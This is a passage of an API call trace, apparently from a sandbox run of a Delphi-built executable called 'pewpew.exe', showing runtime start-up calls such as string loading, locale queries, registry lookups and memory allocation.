uID=0xffd3, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array is locked") returned 0x1f [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffd4, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffef, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Read") returned 0x4 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffd2, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffee, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffeb, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Application Error") returned 0x11 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffd1, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffd0, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Write") returned 0x5 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffe4, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffe5, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Access violation at address %p. %s of address %p") returned 0x30 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffe6, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffe3, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffe1, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xffff, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xfffe, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xfffd, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xfffc, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xfffb, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xfffa, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xfff9, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xfff8, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0060.197] LoadStringA (in: hInstance=0xd0000, uID=0xfff7, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0060.198] LoadStringA (in: hInstance=0xd0000, uID=0xfff6, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0060.198] LoadStringA (in: hInstance=0xd0000, uID=0xfff5, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0060.198] LoadStringA (in: hInstance=0xd0000, uID=0xfff4, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="I/O error %d") returned 0xc [0060.198] LoadStringA (in: hInstance=0xd0000, uID=0xfff3, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0060.198] LoadStringA (in: hInstance=0xd0000, uID=0xfff2, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid argument to date encode") returned 0x1f [0060.236] LoadStringA (in: hInstance=0xd0000, uID=0xfff0, lpBuffer=0x6ef408, cchBufferMax=1024 | out: lpBuffer="'%s' is not a valid integer value") returned 0x21 [0060.236] LoadStringA (in: hInstance=0xd0000, uID=0xffe0, lpBuffer=0x6ef408, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0060.236] GetVersionExA (in: lpVersionInformation=0x6ef7a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x77c70362, dwMinorVersion=0x77c6e192, dwBuildNumber=0x3, dwPlatformId=0x77bb286c, szCSDVersion="E") | out: lpVersionInformation=0x6ef7a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.236] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0060.237] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0060.237] GetThreadLocale () returned 0x409 [0060.237] GetThreadLocale () returned 0x409 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Jan") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x6ef678, cchData=256 | out: lpLCData="January") returned 8 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Feb") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x6ef678, cchData=256 | out: lpLCData="February") returned 9 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Mar") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x6ef678, cchData=256 | out: lpLCData="March") returned 6 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Apr") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x6ef678, cchData=256 | out: lpLCData="April") returned 6 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x6ef678, cchData=256 | out: lpLCData="May") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x6ef678, cchData=256 | out: lpLCData="May") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Jun") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x6ef678, cchData=256 | out: lpLCData="June") returned 5 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Jul") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x6ef678, cchData=256 | out: lpLCData="July") returned 5 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Aug") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x6ef678, cchData=256 | out: lpLCData="August") returned 7 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Sep") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x6ef678, cchData=256 | out: lpLCData="September") returned 10 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Oct") returned 4 [0060.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x6ef678, cchData=256 | out: lpLCData="October") returned 8 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Nov") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x6ef678, cchData=256 | out: lpLCData="November") returned 9 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Dec") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x6ef678, cchData=256 | out: lpLCData="December") returned 9 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Sun") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Sunday") returned 7 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Mon") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Monday") returned 7 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Tue") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Tuesday") returned 8 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Wed") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Wednesday") returned 10 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Thu") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Thursday") returned 9 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Fri") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Friday") returned 7 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Sat") returned 4 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Saturday") returned 9 [0060.238] GetThreadLocale () returned 0x409 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="$") returned 2 [0060.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData=",") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData=".") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="2") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData="/") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0060.260] GetThreadLocale () returned 0x409 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6ef6a0, cchData=256 | out: lpLCData="1") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0060.260] GetThreadLocale () returned 0x409 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6ef6a0, cchData=256 | out: lpLCData="1") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData=":") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="AM") returned 3 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="PM") returned 3 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0060.260] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData=",") returned 2 [0060.261] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x21f0000 [0060.459] RtlAllocateHeap (HeapHandle=0x21f0000, Flags=0x0, Size=0x10000) returned 0x21f0590 [0060.459] RtlAllocateHeap (HeapHandle=0x21f0000, Flags=0x0, Size=0x10000) returned 0x2200598 [0060.459] RtlAllocateHeap (HeapHandle=0x21f0000, Flags=0x0, Size=0x10000) returned 0x22105a0 [0060.459] RtlAllocateHeap (HeapHandle=0x21f0000, Flags=0x0, Size=0x10000) returned 0x22205a8 [0060.459] RtlAllocateHeap (HeapHandle=0x21f0000, Flags=0x0, Size=0x10000) returned 0x22305b0 [0060.459] RtlAllocateHeap (HeapHandle=0x21f0000, Flags=0x0, Size=0x10000) returned 0x22405b8 [0060.459] RtlAllocateHeap (HeapHandle=0x21f0000, Flags=0x0, Size=0x10000) returned 0x22505c0 [0060.459] RtlAllocateHeap (HeapHandle=0x21f0000, Flags=0x0, Size=0x10000) returned 0x22605c8 [0060.757] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0xb05a78 [0060.757] GetKeyboardType (nTypeFlag=0) returned 4 [0060.778] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe\" " [0060.778] GetStartupInfoA (in: lpStartupInfo=0x6ef7fc | out: lpStartupInfo=0x6ef7fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.778] GetVersion () returned 0x1db10106 [0060.778] GetVersion () returned 0x1db10106 [0060.778] GetCurrentThreadId () returned 0xb0c [0060.846] GetModuleFileNameA (in: hModule=0xc0000, lpFilename=0x6ef2f8, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe")) returned 0x30 [0060.846] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ef1d3, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe")) returned 0x30 [0060.846] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6ef2e8 | out: phkResult=0x6ef2e8*=0x0) returned 0x2 [0060.847] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6ef2e8 | out: phkResult=0x6ef2e8*=0x0) returned 0x2 [0060.847] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6ef2e8 | out: phkResult=0x6ef2e8*=0x0) returned 0x2 [0060.935] lstrcpynA (in: lpString1=0x6ef1d3, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" [0060.935] GetThreadLocale () returned 0x409 [0060.935] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x6ef2e3, cchData=5 | out: lpLCData="ENU") returned 4 [0060.935] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 48 [0060.935] lstrcpynA (in: lpString1=0x6ef200, lpString2="ENU", iMaxLength=216 | out: lpString1="ENU") returned="ENU" [0060.935] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0060.936] lstrcpynA (in: lpString1=0x6ef200, lpString2="EN", iMaxLength=216 | out: lpString1="EN") returned="EN" [0060.936] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0060.936] LoadStringA (in: hInstance=0xd0000, uID=0xffc2, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0060.991] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0xb083f8 [0061.134] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2280000 [0061.134] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0xb093f8 [0061.134] VirtualAlloc (lpAddress=0x2280000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2280000 [0061.134] LoadStringA (in: hInstance=0xd0000, uID=0xffc1, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0061.134] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0061.134] LoadStringA (in: hInstance=0xd0000, uID=0xffc0, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0061.134] LoadStringA (in: hInstance=0xd0000, uID=0xffd2, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0061.134] LoadStringA (in: hInstance=0xd0000, uID=0xffdb, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0061.134] LoadStringA (in: hInstance=0xd0000, uID=0xffd1, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0061.134] LoadStringA (in: hInstance=0xd0000, uID=0xffee, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffd5, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffd4, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffe7, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffe8, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffe9, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffe6, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffe4, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffe2, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffe1, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffe0, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xffff, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfffe, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfffd, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfffc, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfffb, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfffa, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfff9, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfff8, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfff7, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfff6, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0061.135] LoadStringA (in: hInstance=0xd0000, uID=0xfff5, lpBuffer=0x6ef41c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0061.153] LoadStringA (in: hInstance=0xd0000, uID=0xfff3, lpBuffer=0x6ef408, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0061.153] LoadStringA (in: hInstance=0xd0000, uID=0xffe3, lpBuffer=0x6ef408, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0061.153] GetVersionExA (in: lpVersionInformation=0x6ef7a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x10000, dwMinorVersion=0x10008, dwBuildNumber=0x22605c2, dwPlatformId=0x22605c0, szCSDVersion="") | out: lpVersionInformation=0x6ef7a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0061.169] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0061.170] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0061.170] GetThreadLocale () returned 0x409 [0061.188] GetThreadLocale () returned 0x409 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Jan") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x6ef678, cchData=256 | out: lpLCData="January") returned 8 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Feb") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x6ef678, cchData=256 | out: lpLCData="February") returned 9 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Mar") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x6ef678, cchData=256 | out: lpLCData="March") returned 6 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Apr") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x6ef678, cchData=256 | out: lpLCData="April") returned 6 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x6ef678, cchData=256 | out: lpLCData="May") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x6ef678, cchData=256 | out: lpLCData="May") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Jun") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x6ef678, cchData=256 | out: lpLCData="June") returned 5 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Jul") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x6ef678, cchData=256 | out: lpLCData="July") returned 5 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Aug") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x6ef678, cchData=256 | out: lpLCData="August") returned 7 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Sep") returned 4 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x6ef678, cchData=256 | out: lpLCData="September") returned 10 [0061.188] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Oct") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x6ef678, cchData=256 | out: lpLCData="October") returned 8 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Nov") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x6ef678, cchData=256 | out: lpLCData="November") returned 9 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Dec") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x6ef678, cchData=256 | out: lpLCData="December") returned 9 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Sun") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Sunday") returned 7 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Mon") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Monday") returned 7 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Tue") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Tuesday") returned 8 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Wed") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Wednesday") returned 10 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Thu") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Thursday") returned 9 [0061.189] GetLocaleInfoA (in: 